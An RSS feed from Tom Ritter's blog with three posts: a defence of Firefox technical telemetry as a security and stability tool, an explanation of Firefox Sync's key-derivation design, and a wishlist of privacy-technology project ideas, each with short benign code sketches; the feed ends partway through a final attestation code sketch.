<?xml version="1.0"?>
<rss version="2.0">
<channel>
<title>ritter.vg</title>
<link>http://ritter.vg</link>
<description>Personal weblog and homepage of Tom Ritter.  A smash and grab approach to technology.</description>

	<item>
		<guid>http://ritter.vg/blog-telemetry.html</guid>
		<title>telemetry helps. you still get to turn it off</title>
		<pubDate>5 Mar 2026 10:12 EST</pubDate>
		<description><![CDATA[
<em>Phew, it's been a minute since I last wrote anything, hasn't it? And this blog design is pretty dated...</em>

<p>Let me start with this: it is your right to disable telemetry. I fully support that right, and in many cases I disable telemetry myself. If your threat model says "nope", or you simply don't like it, flip the switch. Your relationship with the software and its author is a good guide for whether you want to enable telemetry.</p>

<p>What I don't buy is the claim I keep seeing that telemetry is useless and doesn't actually help. I can only speak to Firefox telemetry, but I presume the lesson generalizes. Telemetry has paid for itself many times over on the technical side - stability, security, performance, and rollout safety. If you trust the publisher and want to help them improve the thing you use every day, turning on telemetry is the lowest-effort way to do it. If you don't trust them, or just don't want to... cool.</p>

<p>But be forewarned - if you're one of a very few people doing a very weird thing, we won't even know we need to support that thing. (More on that later.)</p>

<h2>What I mean (and don't mean) by "telemetry"</h2>

<p>Telemetry is a catch-all for measurements and signals a program sends home. In browsers that includes "technical and interaction data" (performance, feature usage, hardware basics), plus things like crash reports that are often controlled by a separate checkbox. To me, telemetry is data you send to the publisher without directly receiving anything in return.</p>

<p>In contrast, there are lots of other phone-home things I wouldn't call telemetry. Software update pings, for example. The publisher can derive data about this - in fact it's one of the only things <a href="https://metrics.torproject.org/webstats-tb.html">Tor Browser 'collects'</a> - but the purpose isn't to tell the publisher something, it's to get you the latest version and that's a direct benefit you gain. Firefox obviously has update pings, but it also has something called Remote Settings which is a tool to sync data to your browser for lots of other useful things. You phone home to get this data. <a href="https://firefox.settings.services.mozilla.com/v1/buckets/main/collections">Here's</a> the list of collections, and <a href="https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-recipes/records">here's a random one</a> (it's overrides for the password autofill to fix certain websites). Overall it's stuff like graphics driver blocklists, addon blocklists, certificate blocklists, data for CRLite, exemptions to tracking protection to unbreak sites, and so on.</p>

<p>And then finally there are things that seem like gratuitous phoning home that I also don't consider telemetry. I don't know the status of all these features and if they still exist, or under what circumstances they happen, but these are things like pinging a known-good website to determine if you're under a captive portal, or <a href="https://github.com/cloudflare/roughtime">roughtime</a> to figure out if all your cert validation is going to break.</p>

<p>Now, even for telemetry, I'm not going to talk about product decisions like "is anyone clicking this button?" Those exist, sure, but they're not my world most days, and I don't have any personal success stories from that world. I deal with technical telemetry - the kind that finds crashes and hangs, proves that risky security changes won't brick Nightly, and helps us pick the fastest safe implementation.</p>

<p>And I'm also not going to argue that you should trust Firefox's telemetry. I think you should make an informed decision - but if you're informed about what we collect (and all the mish-mash of data review approvals); how we collect it including 'regular telemetry' (discards your IP immediately), OHTTP (we never see your IP), Prio (privacy preserving calculations); and how we store it (automatic deletion of old data, segmented and unlinked datasets, etc) - and you still think we aren't doing enough to preserve your privacy... Well I can't argue with that. We aren't the absolute best in the world; we're far from the worst. And if we don't meet your threshold, turn it off.</p>

<p>But my point is: it's not pointless. It's not useless. It helps. It has shipped features you rely on.</p>

<p>As a super simple example you can easily poke at yourself - Mozilla's <a href="https://fqueze.github.io/hang-stats/#date=20260227&row=0">Background Hang Reporter (BHR)</a> exists specifically to collect stacks during hangs on pre-release channels so engineers can find and fix the slow paths. That's telemetry.</p>

<h2>Concrete wins from Firefox Telemetry (just from me)</h2>

<p><em>This is a tiny slice from one developer. There are hundreds more across the project.</em></p>

<dl>
  <dt>Killing eval in the parent process (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1473549">1473549</a>)</dt>
  <dd>
    <p>Eval is bad, right? It can lead to XSS attacks, and when your browser process is (partially) written with JavaScript - that can be a sandbox escape. We tried to eliminate eval in the parent (UI) process, shipped it to Nightly, and immediately broke Nightly. The entire test suite was green and Mozillians had dogfooded the feature for weeks... and it still blew up on real users with real customizations. We had to revert fast and spin a new build. It was a pretty big incident, and not a good day. So we re-did our entire approach here and put in several rounds of extensive telemetry.</p>
    <p>That told us where eval was still happening in the wild, including Mozilla code paths we didn't have tests for and, crucially, a thriving community of Firefox tinkerers using userChromeJS and friends. Because telemetry surfaced those scripts, I could go talk to that community, explain the upcoming change, and work around the breakages. See the <a href="https://github.com/xiaoxiaoflood/firefox-scripts/issues/64">public thread</a> on the firefox-scripts repo for a flavor of that conversation. There's no way we could have safely shipped this without telemetry, and certainly no way we could have preserved your ability to hack Firefox to do what you want.</p>
  </dd>

  <dt>Background Hang Reporter saved me from myself (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1721840">1721840</a>)</dt>
  <dd>
    <p>BHR data showed specific interactions where my code hung - no apparent reason, never would have guessed. I refactored, and the hang graphs dropped. That feedback loop doesn't exist without telemetry being on in pre-release.</p>
  </dd>

  <dt>Fission (site isolation) and data minimization (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1708798">1708798</a>)</dt>
  <dd>
<p>Chrome has focused a lot on removing cross-origin data from content processes, as well as enforcing an IPC security boundary for cross-origin data retrieval. Coming from Tor Browser (where I am also a developer, although not too active), I was also pretty concerned with personal user data unrelated to origin data - stuff like your printer or device name. As part of Fission, I worked to eliminate both cross-origin data and personally identifiable things from the content process so a web process running a Spectre attack couldn't get those details. Telemetry helped us confirm we weren't breaking user workflows as we pulled those identifiers out.</p>
  </dd>

  <dt>Ending internet-facing <code>jar:</code> usage</dt>
  <dd>
    <p>Years ago Firefox allowed <code>jar:</code> URIs from web content, and the security model was... not great. Telemetry let us show that real-web usage was basically nonexistent, which made closing that attack surface from the web a no-brainer.</p>
  </dd>

  <dt>Same story brewing for XSLT</dt>
  <dd>
    <p><a href="https://developer.chrome.com/docs/web-platform/deprecating-xslt">Chrome has been pushing to deprecate/remove XSLT</a> in the browser due to security/maintenance risk and very low usage; I'm supportive. Usage telemetry is the only way we're able to justify removing a feature from the web.</p>
  </dd>

  <dt>Picking the fastest safe canvas noise (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1972586">1972586</a>)</dt>
  <dd>
    <p>For anti-fingerprinting canvas noise generation, I used telemetry to measure which implementation was actually fastest across CPUs: it's SHA-256 if you have SHA extensions; SipHash if you don't - or if the input is under ~2.5KB. That choice matters when you multiply it by billions of calls.</p>
  </dd>

  <dt>Font allowlist for anti-fingerprinting (<a href="https://searchfox.org/firefox-main/search?q=standardfonts-&path=&case=false&regexp=false">Lists</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1795460">1795460</a>)</dt>
  <dd>
    <p>Fonts are a huge fingerprinting vector. We built a font allowlist and font-visibility controls; by design, Firefox's fingerprinting protection avoids using your locally installed one-off fonts on the web. This dramatically shrinks the entropy of "which fonts do you have?" without breaking normal sites. While many browsers do this now, telemetry has helped us continue to improve these defenses and I'm pretty sure we're still the only one that has a font allowlist for Android.</p>
  </dd>

  <dt>Reality check on Resist Fingerprinting users</dt>
  <dd>
    <p>Folks who manually enable our "Resist Fingerprinting" preference (which we don't officially support, and I don't generally recommend - but hey, you do you) are very loud on Bugzilla. VERY loud. To the point where I've had a lot of managers and executives come telling me "Everyone is complaining about this breaking stuff, we really need to disable this so people can't accidentally turn it on." Telemetry let me show that despite being SO LOUD they're still a minute portion of the population. Management's question "Should we block it?" became "No." You're welcome.</p>
  </dd>
</dl>

<p>That's just my lane. People I work closely with used telemetry to:</p>

<ul>
  <li>Ship <a href="https://hacks.mozilla.org/2025/08/crlite-fast-private-and-comprehensive-certificate-revocation-checking-in-firefox/">CRLite</a> (privacy-preserving certificate revocation that's finally practical). Telemetry was instrumental in making this happen.</li>
  <li>Roll out TLS features like Certificate Transparency support and HTTPS-First behavior, watching real-world fallout and compatibility.</li>
  <li>Tighten OS sandboxes. I've been working at Mozilla close to 10 years, and I vividly remember the days we lagged behind Chrome in how tight we had our sandbox. (We're on par now, if you didn't realize.) The only way we could do this was by continually running experiments and monitoring telemetry and crash reports as we identified more and more things we broke and needed to fix before we could ship it.</li>
  <li><a href="https://mas.to/@gabrielesvelto">Gabriele Svelto</a> works in the stability and crash reporting team and has <a href="https://hacks.mozilla.org/2022/11/improving-firefox-stability-with-this-one-weird-trick/">written</a> <a href="https://hacks.mozilla.org/2021/05/improving-firefox-stability-on-linux/">extensively</a> about the unexpected things he finds and diagnoses using crash reports.</li>
</ul>

<p>I could give more examples, but I think you get the idea.</p>

<h2>"I use Foo browser because it disables telemetry."</h2>

<p>Every major browser either implements telemetry or outsources the job to the upstream engine, and benefits from their having it. Period. Even Brave does telemetry, and they're quite public about their design (<a href="https://github.com/brave/brave-browser/wiki/P3A">P3A</a>): collected into buckets/histograms with privacy techniques like shuffling/thresholding. That's a perfectly respectable approach.</p>
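<p>To make the bucketing idea concrete, here's a minimal Python sketch of coarse, bucketed reporting. It's purely illustrative: the bucket boundaries and metric name are made up, and a real design like P3A additionally shuffles reports across users and drops buckets below a minimum population threshold.</p>

```python
# Illustrative sketch of bucketed telemetry reporting -- not Brave's
# actual P3A code. Bucket boundaries and the metric name are made up.
BUCKETS = [0, 1, 5, 10, 50]  # hypothetical lower bound for each bucket

def to_bucket(value):
    """Map an exact count to the index of the highest bucket it reaches."""
    index = 0
    for i, lower_bound in enumerate(BUCKETS):
        if value >= lower_bound:
            index = i
    return index

def report(value):
    # Only the coarse bucket leaves the machine, never the exact count.
    return {"metric": "example-usage", "bucket": to_bucket(value)}
```

<p>Reporting a count of 7 and a count of 9 both land in the same bucket, so any individual report says very little about the individual user.</p>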

<p>We can debate the efficacy or privacy properties of different telemetry designs. We can both stand aghast at overcollection of things that shouldn't be collected. We can debate whether it should be opt-out or opt-in. But only if we both start from the position that telemetry isn't philosophically bad, it can just be implemented badly.</p>

<p>Every Foo browser that brags about disabling telemetry is relying on their upstream source - whether it's Firefox or Chrome - to improve the Foo browser using someone else's telemetry - all while trying to take this moral high ground.</p>

<p>If you want to use Foo because it adds features you like, or you trust its publisher to choose defaults more than upstream - those are completely valid reasons to use it. But if the reason is "Telemetry is just a way for Firefox to spy on me", hopefully I've dented that perception.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-firefox_sync.html</guid>
		<title>What is Firefox Sync and why would you use it</title>
		<pubDate>13 Nov 2018 9:00:34 EST</pubDate>
		<description><![CDATA[
<p><i>This article originally appeared on <a href="https://hacks.mozilla.org/2018/11/firefox-sync-privacy/">the Mozilla Hacks</a> blog.</i></p>

<p style="padding-left: 30px;"><i>That shopping rabbit hole you started on your laptop this morning? Pick up where you left off on your phone tonight. That dinner recipe you discovered at lunchtime? Open it on your kitchen tablet, instantly. Connect your personal devices, securely. – </i><a href="https://www.mozilla.org/en-US/firefox/features/sync/" target="_blank"><i>Firefox Sync</i></a></p>

<p>Firefox Sync lets you share your bookmarks, browsing history, passwords and other browser data between different devices, and <a href="https://www.mozilla.org/en-US/firefox/features/send-tabs/" target="_blank">send tabs</a> from one device to another. It’s a feature that millions of our users take advantage of to streamline their lives and how they interact with the web.</p>

<p>But on an Internet where sharing your data with a provider is the norm, we think it’s important to highlight the privacy aspects of Firefox Sync.</p>

<p>Firefox Sync <b>by default</b> protects all your synced data so Mozilla can’t read it. We built Sync this way because we put user privacy first. In this post, we take a closer look at some of the technical design choices we made and why.</p>

<p>When building a browser and implementing a sync service, we think it’s important to look at what one might call ‘Total Cost of Ownership’. Not just what users <i>get</i> from a feature, but what they <i>give up</i> in exchange for ease of use.</p>

<p>We believe that by making the right choices to protect your privacy, we’ve also lowered the barrier to trying out Sync. When you sign up and choose a strong passphrase, your data is protected from both attackers and from Mozilla, so you can try out Sync without worry. Give it a shot, it’s right up there in the menu bar!</p>

<p class="center"><img src="/resources/sync-01.png" alt="Sign in to Sync Button in the Firefox Menu" width="442" height="178"></p>

<h2>Why Firefox Sync is safe</h2>

<p>Encryption allows one to protect data so that it is entirely unreadable without the key used to encrypt it. The math behind encryption is strong, has been tested for decades, and every government in the world uses it to protect its most valuable secrets.</p>

<p>The hard part of encryption is that key. What key do you encrypt with, where does it come from, where is it stored, and how does it move between places? Lots of cloud providers claim they encrypt your data, and they do. But they also have the key! While the encryption is not meaningless, it is a small measure, and does not protect the data against the most concerning threats.</p>

<p>The encryption key is the essential element. The service provider must <i>never</i> receive it – even temporarily – and must <i>never</i> know it. When you sign into your Firefox Account, you enter a username and passphrase, which are sent to the server. How is it that we can claim to never know your encryption key if that’s all you ever provide us? <em>The difference is in how we handle your passphrase.</em></p>

<p>A typical login flow for an internet service is to send your username and passphrase up to the server, where they hash it, compare it to a stored hash, and if correct, the server sends you your data. (<a href="https://www.wired.com/2016/06/hacker-lexicon-password-hashing/" target="_blank">Hashing</a> refers to converting passwords into unreadable strings of characters that are infeasible to reverse.)</p>

<p class="center"><img src="/resources/sync-02.png" alt="Typical Web Provider Login Flow" /></p>

<p>The crux of the difference in how we designed Firefox Accounts, and Firefox Sync (our underlying syncing service), is that you never send us your passphrase. We transform your passphrase <i>on your computer</i> into two different, unrelated values. With one value, you cannot derive the other<sup id="back-foot-0"><a href="#foot-0">0</a></sup>. We send an authentication token, derived from your passphrase, to the server as the password-equivalent. And the encryption key derived from your passphrase never leaves your computer.</p>

<p class="center"><img src="/resources/sync-03.png" alt="Firefox Sync Login Flow" /></p>

<p>Interested in the technical details? We use 1000 rounds of PBKDF2 to derive your passphrase into the authentication token<sup id="back-foot-1"><a href="#foot-1">1</a></sup>. On the server, we additionally hash this token with <a href="https://en.wikipedia.org/wiki/Scrypt" target="_blank">scrypt</a> (parameters N=65536, r=8, p=1)<sup id="back-foot-2"><a href="#foot-2">2</a></sup> to make sure our database of authentication tokens is even more difficult to crack.</p>
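<p>Here's a rough sketch of that layered hashing using Python's hashlib, just to show the shape of it. This is not the actual Firefox Accounts implementation - the salts are placeholders, and the real protocol (linked in the footnotes) has more moving parts.</p>

```python
import hashlib

# A sketch of the layered hashing described above, not the actual
# Firefox Accounts implementation. Salt values here are placeholders.

def client_auth_token(passphrase: bytes, salt: bytes) -> bytes:
    # Client side: 1000 rounds of PBKDF2 derive the authentication
    # token; only this token is ever sent to the server.
    return hashlib.pbkdf2_hmac("sha256", passphrase, salt, 1000)

def server_stored_hash(auth_token: bytes, salt: bytes) -> bytes:
    # Server side: the received token is hashed again with scrypt
    # (N=65536, r=8, p=1) before being stored, so a stolen database
    # is even harder to crack. maxmem is raised because these
    # parameters need 64 MiB of working memory.
    return hashlib.scrypt(auth_token, salt=salt, n=65536, r=8, p=1,
                          maxmem=128 * 1024 * 1024)
```

<p>The point of the split: even if the server's database leaks, an attacker faces scrypt's memory-hard work factor on top of the client-side stretching, and the encryption key was never in the database to begin with.</p>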

<p>We derive your passphrase into an encryption key using the same 1000 rounds of PBKDF2. It is domain-separated from your authentication token by using <a href="https://tools.ietf.org/html/rfc5869" target="_blank">HKDF</a> with separate info values. We use this key to unwrap an encryption key (which you generated during setup and which we never see unwrapped), and <i>that</i> encryption key is used to protect your data. We use the key to encrypt your data using AES-256 in CBC mode, protected with an HMAC<sup id="back-foot-3"><a href="#foot-3">3</a></sup>.</p>
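<p>A small Python sketch of that domain separation: one stretched passphrase, two unrelated outputs, produced by HKDF (RFC 5869) with different info strings. The salt and info strings below are made up for illustration - the real values live in the protocol spec.</p>

```python
import hashlib
import hmac

# Sketch of HKDF-based domain separation (RFC 5869) -- the salt and
# info strings are illustrative, not the real Firefox Accounts values.

def hkdf_sha256(key: bytes, info: bytes, length: int = 32) -> bytes:
    prk = hmac.new(b"\x00" * 32, key, hashlib.sha256).digest()  # extract
    okm, block, counter = b"", b"", 1
    while len(okm) < length:  # expand
        block = hmac.new(prk, block + info + bytes([counter]),
                         hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]

stretched = hashlib.pbkdf2_hmac("sha256", b"my passphrase", b"example-salt", 1000)
auth_token = hkdf_sha256(stretched, b"auth token")      # sent to the server
unwrap_key = hkdf_sha256(stretched, b"encryption key")  # never leaves the client
```

<p>Because the info strings differ, knowing <code>auth_token</code> tells the server nothing about <code>unwrap_key</code> - which is what lets us authenticate you without ever being able to decrypt your data.</p>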

<p>This cryptographic design is solid – but the constants need to be updated. One thousand rounds of PBKDF2 is low by modern standards, and we intend to increase it in the future (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1320222" target="_blank">Bug 1320222</a>). The token is only ever sent over an HTTPS connection (with preloaded HPKP pins) and is not stored; still, when we initially developed this and needed to support low-power, low-resource devices, a trade-off was made. AES-CBC + HMAC is acceptable – it would be nice to upgrade this to an authenticated mode sometime in the future.</p>

<h2>Other approaches</h2>

<p>This isn’t the only approach to building a browser sync feature. There are at least three other options:</p>

<h3>Option 1: Share your data with the browser maker</h3>

<p>In this approach, the browser maker is able to read your data, and use it to provide services to you. For example, when you sync your browser history in Chrome it will automatically go into your <a href="https://myactivity.google.com/" target="_blank">Web &amp; App Activity</a> unless you’ve changed the default settings. As Google Chrome Help explains, “Your activity may be used to personalize your experience on other Google products, like Search or ads. For example, you may see a news story recommended in your feed based on your Chrome history.”<sup id="back-foot-4"><a href="#foot-4">4</a></sup></p>

<h3>Option 2: Use a separate password for sign-in and encryption</h3>

<p>We developed Firefox Sync to be as easy to use as possible, so we designed it from the ground up to derive an authentication token and an encryption key – and we never see the passphrase <i>or</i> the encryption key. One cannot safely derive an encryption key from a passphrase if the passphrase is sent to the server.</p>

<p>One could, however, add a second passphrase that is never sent to the server, and encrypt the data using that. Chrome provides this as a non-default option<sup id="back-foot-5"><a href="#foot-5">5</a></sup>. You can sign in to sync with your Google Account credentials; but you choose a separate passphrase to encrypt your data. It’s imperative you choose a separate passphrase though.</p>

<p>All in all, we don’t care for the design that requires a second passphrase. This approach is confusing to users. It’s very easy to choose the same (or similar) passphrase and negate the security of the design. It’s hard to determine which is more confusing: to require a second passphrase or to make it optional! Making it optional means it will be used very rarely. We don’t believe users should have to opt-in to privacy.</p>

<h3>Option 3: Manual key synchronization</h3>

<p>The key (pun intended) to auditing a cryptographic design is to ask about the key: <em>“Where does it come from? Where does it go?”</em> With the Firefox Sync design, you enter a passphrase of your choosing and it is used to derive an encryption key that never leaves your computer.</p>

<p>Another option for Sync is to remove user choice, and provide a passphrase <i>for</i> you (that never leaves your computer). This passphrase would be secure and unguessable – which is an advantage, but it would be near-impossible to remember – which is a disadvantage.</p>

<p>When you want to add a new device to sync to, you’d need your existing device nearby in order to manually read and type the passphrase into the new device. (You could also scan a QR code if your new device has a camera).</p>

<h3>Other Browsers</h3>

<p>Overall, Sync works the way it does because we feel it’s the best design choice. Options 1 and 2 don’t provide thorough user privacy protections by default. Option 3 results in lower user adoption and thus reduces the number of people we can help (more on this below).</p>

<p>As noted above, Chrome implements Option 1 by default, which means <i>unless you change the settings before you enable sync</i>, Google will see all of your browsing history and other data, and use it to market services to you. Chrome also implements Option 2 as an opt-in feature.</p>

<p>Opera <s>and Vivaldi</s> follow Chrome’s lead, implementing Option 1 by default and Option 2 as an opt-in feature. <b>Update:</b> Vivaldi actually prompts you for a separate password by default (Option 2), and allows you to opt-out and use your login password (Option 1).</p>

<p>Brave, also a privacy-focused browser, has implemented Option 3. And, in fact, Firefox <i>also</i> implemented a form of Option 3 in its original Sync Protocol, but we changed our design in April 2014 (Firefox 29) in response to user feedback<sup id="back-foot-6"><a href="#foot-6">6</a></sup>. For example, our original design (and Brave’s current design) makes it much harder to regain access to your data if you lose your device or it gets stolen. Passwords or passphrases make that experience substantially easier for the average user, and significantly increased Sync adoption by users.</p>

<p>Brave’s sync protocol has some interesting wrinkles<sup id="back-foot-7"><a href="#foot-7">7</a></sup>. One distinct minus is that you can’t change your passphrase if it is stolen by malware. Another interesting wrinkle is that Brave does not keep track of how many or what types of devices you have. This is a nuanced security trade-off: having less information about the user is always desirable… The downside is that Brave can’t allow you to detect when a new device begins receiving your sync data, or allow you to deauthorize it. We respect Brave’s decision. In Firefox, however, we have chosen to provide this additional security feature for users (at the cost of knowing more about their devices).</p>

<h2>Conclusion</h2>

<p>We designed Firefox Sync to protect your data – by default – so Mozilla can’t read it. We built it this way – despite trade-offs that make development and offering features more difficult – because we put user privacy first. At Mozilla, this priority is a core part of <a href="https://www.mozilla.org/en-US/mission/" target="_blank">our mission</a> to “ensure the Internet is a global public resource… where individuals can shape their own experience and are empowered, safe and independent.”</p>

<hr>

<p><small><sup id="foot-0">0</sup> It is possible to use one to <em>guess</em> the other, but only if you choose a weak password. <a href="#back-foot-0">⬑</a></small></p>

<p><small><sup id="foot-1">1</sup>&nbsp;You can find more details in the <a href="https://github.com/mozilla/fxa-auth-server/wiki/onepw-protocol" target="_blank">full protocol specification</a> or by following the code <a href="https://github.com/mozilla/fxa-js-client/blob/1d92f0ec458aceb56ef1619b5365ad8621183a1d/client/lib/credentials.js#L53" target="_blank">starting at this point</a>. There are a few details we have omitted to simplify this blog post, including the difference between kA and kB keys, and application-specific subkeys. <a href="#back-foot-1">⬑</a></small></p>

<p><small><sup id="foot-2">2</sup> Server hashing code is <a href="https://github.com/mozilla/fxa-auth-server/blob/c28f227dc089eaf949494e8c3f810e31d9789dfa/lib/crypto/password.js#L20" target="_blank">located here</a>. <a href="#back-foot-2">⬑</a></small></p>

<p><small><sup id="foot-3">3</sup> The encryption code can be seen <a href="https://searchfox.org/mozilla-central/rev/65f9687eb192f8317b4e02b0b791932eff6237cc/services/sync/modules/record.js#145" target="_blank">here</a>. <a href="#back-foot-3">⬑</a></small></p>

<p><small><sup id="foot-4">4</sup> <a href="https://support.google.com/chrome/answer/165139" target="_blank">https://support.google.com/chrome/answer/165139</a> Section “Use your Chrome history to personalize Google” <a href="#back-foot-4">⬑</a></small></p>

<p><small><sup id="foot-5">5</sup>&nbsp;Chrome 71 says “For added security, Google Chrome will encrypt your data” and describes these two options as “Encrypt synced passwords with your Google username and password” and “Encrypt synced data with your own <a href="https://support.google.com/chrome/?p=settings_encryption" target="_blank">sync passphrase</a>”. Despite this wording, only the sync passphrase option protects your data from Google. <a href="#back-foot-5">⬑</a></small></p>

<p><small><sup id="foot-6">6</sup>&nbsp;One of the original engineers of Sync has written <a href="https://blog.mozilla.org/warner/2014/04/02/pairing-problems/" target="_blank">two</a> <a href="https://blog.mozilla.org/warner/2014/05/23/the-new-sync-protocol/" target="_blank">blog posts</a> about the transition to the new sync protocol, and why we did it. If you’re interested in the usability aspects of cryptography, we highly recommend you read them to see what we learned. <a href="#back-foot-6">⬑</a></small></p>

<p><small><sup id="foot-7">7</sup>&nbsp;You can read more about Brave sync <a href="https://github.com/brave/sync/wiki/Design" target="_blank">on Brave’s Design page</a>. <a href="#back-foot-7">⬑</a></small></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-my_tech_wishlist.html</guid>
		<title>My Tech Wishlist</title>
		<pubDate>14 Feb 2017 11:20 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
h3 {
font-size:x-large;
text-decoration: underline;
}
h4 {
font-size:large;
}
</style>

<p>Over time, I've accumulated a lot of ideas that I would love to work on myself, but have to admit I pretty much never will (there are only so many hours in the day). At the same time, I regularly see project proposals (as part of the Advisory Councils for <a href="https://www.opentech.fund/">OTF</a> and <a href="https://www.coreinfrastructure.org/">CII</a>) that... while not bad, often don't inspire excitement in me. So I thought I'd write down some of my ideas in the hope that they inspire someone else.</p>

<p>Of note: I don't know about everything on the Internet. It's a certainty that someone out there already uses something like what I want on the daily. Please, leave a comment and point to implementations!</p>

<h3>Ideas</h3>

<h4>Secure Mobile Encryption with a PIN</h4>

<p>Why do you think the FBI had to go to Apple to unlock a suspect's iPhone, but they've never had to go to Google? On a new iPhone (emphasis new, older models don't apply), the '10 incorrect PINs erase the phone' functionality is backed by hardware and very difficult to bypass. On Android... there is such a landscape of phones that even if <em>one</em> of them had hardware-backed security for the PIN (and I don't even know if one does!) you'd have to go out of your way to purchase that individual phone.</p>

<p>Now let's switch to the perspective of app developers. You want to build your app so if someone seizes or steals the user's phone, there's protection against brute force attacks trying to obtain a user's data. But with the landscape of Android being what it is, you can't rely on the lockscreen. (And recommending a user go buy a new phone is out of the question.) So you have to build the feature yourself: if you encrypt the database, you have to assume the (encrypted) database can be extracted from the phone. There's no safe place to store the key on the phone, so the only thing protecting against brute force is the user's PIN or password. And it's not like typing in a 10-word pass-poem is friendly on a phone - especially if it's required every time you open the app!</p>

<p>So as an application developer - you're screwed. There's <em>no way</em> to enable a user to have a good experience with your app <em>and</em> protect their data. <strong>But it doesn't have to be this way.</strong> An Android phone has a plethora of secure elements on it - hardware devices that are difficult for attackers to bypass. And the most universal one is... the SIM card.</p>

<p>Imagine an Android app that loads a small JavaCard applet onto the SIM Card. Upon app startup, the user creates a 4-digit PIN that is passed to and stored in the JavaCard applet. The JavaCard applet generates a random encryption key and passes it to the Android app, which uses it to encrypt that database that is stored on the phone. Next time you start up the Android app, you enter a PIN - which gets passed to the JavaCard applet. If the PIN matches what's stored in the applet, the applet returns the encryption key and the app uses it to decrypt the database. But after 10 wrong tries the applet erases the key - locking the attacker out of the database forever. The important point here is that the PIN (or encryption key) is difficult to extract from the SIM card because that's why SIM cards exist - to have a small secure element where it's difficult to steal data from.</p>
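<p>To make that flow concrete, here's a toy model of the applet's state machine, with Python standing in for the real JavaCard code. The class and method names are made up for illustration; a real applet would run on-card and communicate over APDUs.</p>

```python
import os

# Toy model of the SIM applet described above. Python stands in for
# JavaCard here; names and structure are illustrative only.

class PinProtectedKey:
    MAX_TRIES = 10

    def __init__(self, pin: str):
        self._pin = pin
        self._key = os.urandom(32)  # random key generated inside the "applet"
        self._tries_left = self.MAX_TRIES

    def unlock(self, attempt: str):
        """Return the key on a correct PIN; erase it after 10 failures."""
        if self._key is None:
            raise RuntimeError("key erased - the database is gone forever")
        if attempt == self._pin:
            self._tries_left = self.MAX_TRIES
            return self._key
        self._tries_left -= 1
        if self._tries_left == 0:
            self._key = None  # brute-force lockout: erase the key
        return None
```

<p>The crucial property is that the key only ever exists inside the secure element until a correct PIN is presented, so an attacker who extracts the encrypted database still gets exactly 10 guesses, no matter how much computing power they have.</p>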

<p>Just like that, we have enforceable brute force protection for even 4-digit PINs. Want to build this? Where do you get started? Well, <a href="https://seek-for-android.github.io/">SEEK for Android</a> is an Android patch that adds a SmartCard API. <a href="http://nelenkov.blogspot.com/2013/09/using-sim-card-as-secure-element.html">Nikolay Elenkov</a> wrote a blog post several years ago about doing something very similar to this idea.</p>

<p>Regrettably the end-game for this is somewhat limited. It's impossible to load JavaCard applets onto normal US carrier SIMs (because they're locked down). You can buy <a href="http://www.androidauthority.com/best-dual-sim-android-phones-529470/">pretty nice</a> Dual-SIM Android phones and put a carrier SIM in one slot and a programmable SIM in the other slot. But this doesn't solve the 'Don't require people to buy a new phone' problem. This does seem like the type of thing that Copperhead would be interested in (and LineageOS and potentially other Android OSes).</p>

<h4>Privacy Preserving Location Sharing</h4>

<p>Location is a pretty personal thing. No one <em>wants</em> to give their location to some third party to store forever and track them. Nor does anyone want to constantly give out their location to a huge list of friends or acquaintances on the off chance one might be 'nearby'. <em>But</em> when you're meeting someone, or traveling to a new city, or going out to the bar with friends, or a host of other scenarios - it would be nice to share your location automatically. An app that shares location, with a lot of privacy settings and geo-fences, sounds like a really useful tool. Could it exist?</p>

<p>It could! <a href="https://cs.uwaterloo.ca/~uhengart/publications/pet07.pdf">A paper was published</a> talking about how to accomplish it in <u>2007</u>. Since then it's been cited something like <a href="https://scholar.google.com/scholar?cites=16272090068473742217&as_sdt=400005&sciodt=0,14&hl=en">170 times</a> which implies there might have been some improvements. In <u>2008</u> this was implemented as <a href="https://crysp.uwaterloo.ca/software/nearbyfriend/index.html">NearbyFriend</a>; and in <u>2012</u> it was <a href="https://nohats.ca/wordpress/blog/2012/04/06/geome-a-small-utility-to-get-your-geo-location-to-be-used-by-otr/">updated</a> (kinda) to use a more free geolocation API. But both projects have sat dormant.</p> 

<p>I think that's a shame, and more than a shame - it's an opportunity. This functionality sits well with the end-to-end encrypted messengers we use daily. Some of the features I'd want include controlling location granularity, geo-fences around places I don't ever want to 'be', and 'muting' contacts so that they can't tell I'm purposely not sharing my location with them.</p>
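Two of those features are easy to sketch client-side. This is purely illustrative - the function names and grid size are mine - but it shows coarsening location granularity and checking geo-fences before anything leaves the device:

```python
def coarsen(lat, lon, granularity=0.05):
    """Snap a location to a coarse grid (0.05 degrees of latitude is roughly
    5 km) so a contact only learns the rough area, not the exact spot."""
    snap = lambda x: round(x / granularity) * granularity
    return (snap(lat), snap(lon))

def should_share(lat, lon, geofences):
    """geofences: (lat, lon, radius) circles - e.g. home - we never report from.
    Returns False if the current position falls inside any of them."""
    return all((lat - g[0]) ** 2 + (lon - g[1]) ** 2 > g[2] ** 2
               for g in geofences)
```

The key design point: both checks run in the client, so the server (and your contacts) only ever see what survives them.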

<h4>Remote Server Attestation of OSS Server Configs</h4>

<p>When it comes to UEFI and Secure Boot and all that jazz, I kind of wave my hands around and butcher what <a href="https://prosauce.org/">Ted Reed</a> has told me in various bars and airports. So without further ado... <em>/me begins waving his hands</em>.</p>

<p>Secure Boot is this term for saying that when your computer boots up, it does so (or can do so if you chant the right incantations) into a kernel that is signed. The entire boot process moves from a signed BIOS to a signed kernel and signed kernel modules. We want to take this a step further with Remote Attestation. Remote Attestation is a way of saying "This is the hash of all the code I am running currently." That includes the kernel and can include userspace. The hash is signed by a key that is baked into hardware.</p>
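The measurement chain can be sketched in a few lines. This mimics a TPM-style PCR extend (the exact hash algorithm and register layout vary by TPM version; this is illustrative):

```python
import hashlib

def extend(pcr, component):
    """TPM-style PCR extend: new = H(old || H(component)). Because each value
    folds in the previous one, the final value commits to the whole chain,
    in order."""
    return hashlib.sha256(pcr + hashlib.sha256(component).digest()).digest()

def measure_chain(components):
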